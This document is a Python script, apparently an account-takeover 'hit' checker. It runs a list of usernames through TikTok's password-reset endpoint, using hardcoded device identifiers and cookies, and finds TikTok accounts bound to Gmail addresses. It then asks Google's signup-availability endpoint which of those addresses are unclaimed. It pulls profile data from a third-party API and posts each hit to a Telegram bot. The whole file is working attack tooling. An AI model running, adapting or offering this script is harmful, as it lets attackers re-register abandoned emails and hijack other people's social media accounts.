try:
	import requests,os,random
	from user_agent import generate_user_agent
	from uuid import uuid4
	import socket
	import webbrowser
	import threading
	import sys
	import json
except:
	os.system("pip install requsets")
	os.system("pip install names")
	os.system("pip install user_agent")
	os.system("pip install uid")
	os.system("pip install uuid")
	os.system("pip install webbrowser")
	os.system("pip install socket")
	os.system("pip install threading")
	os.system("clear")
os.system('clear')
CCF = ["BY","TJ","TM","KZ","GB","DE","ES","FR","UZ","KG","MD","AC","AD","AF","AG","AI","AL","AM","AO","AQ","AS","AU","AW","AX","BA","BB","BD","BF","BG","BI","BJ","BL","BM","BN","BQ","BS","BT","BV","BW","BZ","CA","CC","CD","CF","CG","CI","CK","CM","CN","CS","CU","CV","CW","CX","CY","DK","DM","DR","EA","EE","EH","EN","ET","FJ","FK","FM","FO","GA","GD","GE","GF","GG","GH","GI","GL","GN","GP","GQ","GS","GU","GW","GY","HK","HR","HT","IC","IE","IL","IM","IN","IO","IS","JE","KE","KH","KI","KN","KY","LA","LC","LI","LK","LR","LS","LU","LV","MC","ME","MF","MG","MH","MK","ML","MM","MN","MO","MP","MQ","MS","MT","MU","MV","MW","MZ","NA","NC","NE","NF","NG","NJ","NO","NR","NU","NZ","PF","PG","PK","PM","PN","PR","PW","QS","RE","RW","SB","SC","SH","SI","SJ","SL","SM","SN","SR","ST","SX","SZ","TC","TF","TG","TK","TL","TO","TP","TS","TV","TZ","UG","UM","VA","VC","VG","VI","VU","WF","WS","XA","XB","XK","XX","YJ","YT","ZA","ZG","ZM","ZN","ZW","ZZ","ES","TR","AZ","MA","LB","DZ","ER","TN","SS","BR","MX","TH","ID","MY","VN","PH","SG","KR","JP","EG","SY","PS","JO","IQ","DJ","KM","SO","TD","OM","QA","KW","AE","BH","SA","YE","LY","SD","MR","LT","JM","CH","IR","AN","FI","PY","AR","GR","UY","CR","DO","PE","IT","TT","SV","CZ","BE","CO","TW","HN","EC","SK","NP","RS","NI","SE","GT","CL","NL","RO","HU","VE","AT","PL","PA","BO","GM","PT"]
#-------------------#
Z = '\033[1;31m' 
X = '\033[1;33m' 
F = '\033[2;32m' 
C = "\033[1;97m" 
B = '\033[2;36m'
Y = '\033[1;34m' 
C = "\033[1;97m" 
E = '\033[1;31m'
B = '\033[2;36m'
G = '\033[1;32m'
S = '\033[1;33m'
#-------------------#
hj=0
fc=0
hc=0
fj=0
vipDOFLAMINGO=999999999999999


print(F+'Tik'+Y+'Tok '+E+'To'+B+'ol'+Z)
print(B+'_'*40)
print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)
print(B+'_'*40)
ID=input(Y+'ID           :  '+F)
print(B+'_'*40)
tok=input(Y+'token   :  '+F)
print(B+'_'*40)
Filename=input(Y+'file name   :  '+F)
print(B+'_'*40)
os.system('clear')
DDF = random.choice(CCF)
ff=0
def telegram(email):
	username=email.split('@gmail.com')[0]
	api= (f'https://el-sherif.shop/Mahmoud/api/tik.php?user={username}')
	req=requests.get(api).json()
	useer=req['user']
	namee=req['name']
	followers=req['followers']
	following=req['following']
	likes=req['likes']
	bio=req['bio']

	tlg = f'''
<<   new tiktok account  >>
-_-_-_-_-_-_-_-_-_-_-_-_-_-
 name: {namee}
 username : {username}
 Email : {email}
 followers : {followers}
 following : {following}
 likes : {likes}
 bio : {bio}
-_-_-_-_-_-_-_-_-_-_-_-_-_-
 PY : @FDDYY
		'''
	
	print(F+tlg)
	requests.post(f"https://api.telegram.org/bot{tok}/sendMessage?chat_id={ID}&text="+str(tlg))
	

         

def gmail(email):
	global fc,fj
	eml=str(email)
	email=eml.split('@')[0]+'@gmail.com'
	url = 'https://android.clients.google.com/setup/checkavail'
	h = {
		'Content-Length':'98',
		'Content-Type':'text/plain; charset=UTF-8',
		'Host':'android.clients.google.com',
		'Connection':'Keep-Alive',
		'user-agent':'GoogleLoginService/1.3(m0 JSS15J)',
		}
	d = json.dumps({
		'username':email,
		'version':'3',
		'firstName':'AbaLahb',
		'lastName':'AbuJahl'
	})
	res = requests.post(url,data=d,headers=h)
	if res.json()['status'] == 'SUCCESS':
	   fj+=1
	   os.system('clear')
	   print(f'''
 {B} - {F}Good tiktok : ⦃ {hj} ⦄    
 {B} - {Z}Bad Gmail  : ⦃ {fc} ⦄ 
 {B} - {X}Bad tiktok  : ⦃ {hc} ⦄      
 {B} - {Y}Good Gmail : ⦃ {fj} ⦄      
''')
	   print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)
       
	   telegram(email)	    
	else:
	    fc+=1
	    os.system('clear')
	    print(f'''
 {B} - {F}Good tiktok : ⦃ {hj} ⦄    
 {B} - {Z}Bad Gmail  : ⦃ {fc} ⦄ 
 {B} - {X}Bad tiktok  : ⦃ {hc} ⦄      
 {B} - {Y}Good Gmail : ⦃ {fj} ⦄      
''')
	    print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)

	 
def tiktok(email):
 global hc,hj
 email=str(email)
 url = f'https://api2-19-h2.musical.ly/aweme/v1/passport/find-password-via-email/?app_language=ar&manifest_version_code=2018101933&_rticket=1667149902064&iid=7160349471136909061&channel=googleplay&language=ar&fp=&device_type=ANY-LX2&resolution=1080*2298&openudid=39e9b96bb5c6e336&update_version_code=2018101933&sys_region=IQ&os_api=30&is_my_cn=0&timezone_name=Asia%2FBaghdad&dpi=480&carrier_region={DDF}&ac=wifi&device_id=7116197109661091333&mcc_mnc=41805&timezone_offset=10800&os_version=11&version_code=880&carrier_region_v2=418&app_name=musical_ly&ab_version=8.8.0&version_name=8.8.0&device_brand=HONOR&ssmix=a&pass-region=1&build_number=8.8.0&device_platform=android&region=SA&aid=1233&ts=1667149902&as=a1261b755ea4d3e04e4388&cp=be4a3c6ce5e8520fe1MkUo&mas=0149d8edb9a3340aacd5c82fcadadde3801c1ccc2ca62c0ca6cc26'
 
 headers = {
'Host': 'api2-19-h2.musical.ly',
'Connection': 'keep-alive',
'Content-Length': '647',
'Cookie': 'odin_tt=b0db11ac4955afa4589bdb09d8f8fdcf3bcdea5238d0a6e2ba7c6aaea542e8d4ff9a3f324c153df80e03ac5e29a9d411925fa05d2f300713a2295db1eeff68accf50d5ddb5abd11115077fe989cfc094; store-idc=maliva; store-country-code=iq; store-country-code-src=did',
'Accept-Encoding': 'gzip',
'X-SS-QUERIES': 'dGMCAr6ot3awALq2qSjedy1Vk99nIoud%2BAhHSPAsj5dyUWFbxRx0wm95EoKwwNB3VVlOMd4SzMIENA51cwBS%2Bm0N1T95yguPVZ4OunAWAs0t0bHbsPclnVdl1Uh%2BLGZVXFGTew%3D%3D',
'sdk-version': '1',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-SS-TC': '0',
'User-Agent': 'com.zhiliaoapp.musically/2018101933 (Linux; U; Android 11; ar_IQ_#u-nu-latn; ANY-LX2; Build/HONORANY-L22CQ; Cronet/58.0.2991.0)'
}


 data = (f'app_language=ar&manifest_version_code=2018101933&_rticket=1667150564079&iid=7160349471136909061&channel=googleplay&language=ar&fp=&device_type=ANY-LX2&resolution=1080*2298&openudid=39e9b96bb5c6e336&update_version_code=2018101933&sys_region=IQ&os_api=30&is_my_cn=0&timezone_name=Asia%2FBaghdad&dpi=480&email={email}&retry_type=no_retry&carrier_region={DDF}&ac=wifi&device_id=7116197109661091333&mcc_mnc=41805&timezone_offset=10800&os_version=11&version_code=880&carrier_region_v2=418&app_name=musical_ly&ab_version=8.8.0&version_name=8.8.0&device_brand=HONOR&ssmix=a&pass-region=1&build_number=8.8.0&device_platform=android&region=SA&aid=1233')

 rr = requests.post(url, headers=headers, data=data).text

 if 'Sent successfully' in rr:
 	hj+=1
 	os.system('clear')
 	print(f'''
 {B} - {F}Good tiktok : ⦃ {hj} ⦄    
 {B} - {Z}Bad Gmail  : ⦃ {fc} ⦄ 
 {B} - {X}Bad tiktok  : ⦃ {hc} ⦄      
 {B} - {Y}Good Gmail : ⦃ {fj} ⦄      
''')
 	print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)
 	gmail(email)
 
 elif 'Bind device by email failed' in rr:
    os.system('clear')
    hc+=1
    print(f'''
 {B} - {F}Good tiktok : ⦃ {hj} ⦄    
 {B} - {Z}Bad Gmail  : ⦃ {fc} ⦄ 
 {B} - {X}Bad tiktok  : ⦃ {hc} ⦄      
 {B} - {Y}Good Gmail : ⦃ {fj} ⦄      
''')
    print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)
 else:
   hc+=1
   os.system('clear')
   print(f'''
 {B} - {F}Good tiktok : ⦃ {hj} ⦄    
 {B} - {Z}Bad Gmail  : ⦃ {fc} ⦄ 
 {B} - {X}Bad tiktok  : ⦃ {hc} ⦄      
 {B} - {Y}Good Gmail : ⦃ {fj} ⦄      
''')
   print(F+'DV '+Y+'BY '+E+'@vip_'+B+'DOFLAMINGO'+Z)


def loop():
 file = open(Filename,'r').read().splitlines()
 for DOFLAMINGO in file:
   email=DOFLAMINGO+'@gmail.com'
   try:
    tiktok(email)
   except:
     continue
 exit('done')
loop() 
